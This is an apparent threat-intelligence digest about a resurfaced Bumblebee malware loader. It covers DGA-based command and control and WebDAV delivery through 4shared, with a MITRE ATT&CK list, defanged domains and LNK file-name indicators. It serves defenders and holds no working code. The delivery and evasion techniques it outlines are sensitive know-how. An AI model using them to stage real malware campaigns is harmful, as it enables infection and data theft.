Bumblebee loader has resurfaced with new evasion and distribution techniques, including a domain-generation algorithm (DGA) for C2 and WebDAV-based delivery via 4shared. The campaign shows attackers leveraging 4shared WebDAV, LNK/ZIP attachments, and varied execution paths to complicate detection and takedowns.
Read more: #Bumblebee #WebDAV #DGA #4shared #Conti #Akira
Read more: #Bumblebee #WebDAV #DGA #4shared #Conti #Akira
Keypoints
- The Bumblebee malware loader has reappeared after a hiatus and is linked to ransomware-affiliated threat actors, including those historically associated with Conti and Trickbot.
- Updates include reduced dependency on hard-coded C2s and the adoption of a Domain Generation Algorithm (DGA) for dynamic C2 reachability.
- A new distribution vector uses WebDAV via 4shared, with malicious spam emails delivering .LNK and .ZIP attachments that trigger Bumblebee download.
- Observed command sequences include mounting WebDAV shares, expanding or copying files, and using WMIC, conhost.exe, or schtasks to execute payloads.
- The campaign demonstrates increased evasion capabilities and the use of legitimate services to harden operations, suggesting actor sophistication post-summer pause.
<liDefenders are advised to block webdav.4shared[dot]com and other .life domains generated by the DGA, and to monitor for specific LNK-related command activity.
MITRE Techniques
- [T1566] Phishing – Adversaries conduct mass malware spam campaigns to infect end users and increase botnet size. ‘Adversaries conduct mass malware spam campaigns to infect end users and increase botnet size.’
- [T1204.001] User Execution: Malicious Link – Spam operations rely on a user clicking a malicious link to gain execution. ‘Spam operations rely on a user clicking a malicious link to gain execution.’
- [T1204.002] User Execution: Malicious File – The attached .LNK file initiates the Windows command processor, which then executes a preconfigured set of commands. ‘The attached .LNK file initiates the Windows command processor, which then executes a preconfigured set of commands.’
- [T1053.005] Scheduled Task – Adversaries use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. ‘Scheduled Task/Job: Scheduled Task’ and ‘Adversaries use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence.’
- [T1568.002] Dynamic Resolution: Domain Generation Algorithms – DGAs generate destination domains for C2 traffic dynamically. ‘Using a 64-bit static seed value, the DGA generated 100 new domains with a “.life” top-level domain (TLD). When the payload is executed, Bumblebee will iterate until it resolves a DGA domain to an IP address and successfully checks in.’
- [T1571] Non-Standard Port – Malware uses raw sockets and communicates over TCP on port 443, a commonly used port for HTTPS traffic. ‘Malware uses raw sockets and communicates over TCP on port 443, a commonly used port for Hypertext Transfer Protocol Secure (HTTPS) traffic.’
- [T1573.001] Encrypted Channel: Symmetric Cryptography – Adversaries employ a known symmetric encryption algorithm to conceal C2 traffic. ‘Adversaries employ a known symmetric encryption algorithm to conceal C2 traffic.’
- [T1573.002] Encrypted Channel: Asymmetric Cryptography – Adversaries employ a known asymmetric encryption algorithm to conceal C2 traffic. ‘Adversaries employ a known asymmetric encryption algorithm to conceal C2 traffic.’
- [T1132] Data Encoding – Adversaries encode data to make the content of C2 traffic more difficult to detect. ‘Adversaries encode data to make the content of C2 traffic more difficult to detect.’
- [T1001] Data Obfuscation – Adversaries obfuscate C2 traffic to make it more difficult to detect. ‘Adversaries obfuscate C2 traffic to make it more difficult to detect.’
- [T1568.002] Dynamic Resolution: Domain Generation Algorithms (reiterated) – ‘Dynamic Resolution: Domain Generation Algorithms’
- [T1020] Automated Exfiltration – Adversaries exfiltrate data, such as sensitive documents, through automated processing after being gathered during collection. ‘Automated Exfiltration’
- [T1041] Exfiltration Over C2 Channel – Adversaries steal data by exfiltrating it over an existing C2 channel. ‘Exfiltration Over C2 Channel’
- [T1608.001] Stage Capabilities: Upload Malware – Adversaries upload malware to third-party or adversary-controlled infrastructure to leverage it during operations. ‘Stage Capabilities: Upload Malware’
- [T1608.002] Stage Capabilities: Upload Tool – Adversaries upload tools to third-party or adversary-controlled infrastructure to leverage it during operations. ‘Stage Capabilities: Upload Tool’
- [T1592.004] Gather Victim Host Information: Client Configurations – Malware lists the compromised host configuration that may include operating system or version, virtualization, architecture, language and/or time zone. ‘Gather Victim Host Information: Client Configurations’
- [T1587.001] Develop Capabilities: Malware – Adversaries develop malware to support and enhance their operations. ‘Develop Capabilities: Malware’
- [T1588.001] Obtain Capabilities: Malware – Adversaries purchase malware from third parties to enhance their operations. ‘Obtain Capabilities: Malware’
- [T1588.002] Obtain Capabilities: Tool – Adversaries purchase or acquire stolen licenses to legitimate tools, which are abused during their operations. ‘Obtain Capabilities: Tool’
Indicators of Compromise
- [Domain] – webdav.4shared[dot]com, 3v1n35i5kwx[dot]life, cmid1s1zeiu[dot]life, Itszko2ot5u[dot]life, newdnq1xnl9[dot]life
- [URL] – https://webdav.4shared[dot]com
- [File Name] – scan-document_2023(383).lnk, notify-september_2023(309).lnk
- [File Name] – document-07september_2023(341).lnk, invoice-07september_2023(231).lnk
- [Regex] – [a-z]+-[0-9a-z]+_2023([0-9]{3}).lnk, [0-9]{2-3}.lnk
Read more: https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign